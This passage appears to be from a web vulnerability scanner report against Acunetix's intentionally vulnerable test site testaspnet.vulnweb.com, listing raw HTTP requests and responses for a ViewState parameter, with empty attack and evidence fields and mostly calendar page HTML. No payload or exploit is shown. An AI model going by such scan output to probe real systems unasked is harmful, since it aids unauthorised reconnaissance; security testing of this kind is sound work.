href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8290&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAX7xRlNoIZGRkBF8N6FZbx8s8asCfDOnBlydHZ%2Bc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLtpa3DDALtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtzZwaV%2FlxqH7be0wYBzlOVeZLbR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:37 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAX7xRlNoIZGRkBF8N6FZbx8s8asCfDOnBlydHZ+c=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLtpa3DDALtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtzZwaV/lxqH7be0wYBzlOVeZLbR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:White" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8497&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAA4gf7NtsIZGRkbXf%2B7KtEp0JU4XsMJTMa%2BkOFA6A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKMy4%2FQAwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwe5JQU4dpBFJgPk6DlA7uLjeZ05Gg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:15 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAA4gf7NtsIZGRkbXf+7KtEp0JU4XsMJTMa+kOFA6A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKMy4/QAwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwe5JQU4dpBFJgPk6DlA7uLjeZ05Gg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:White" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 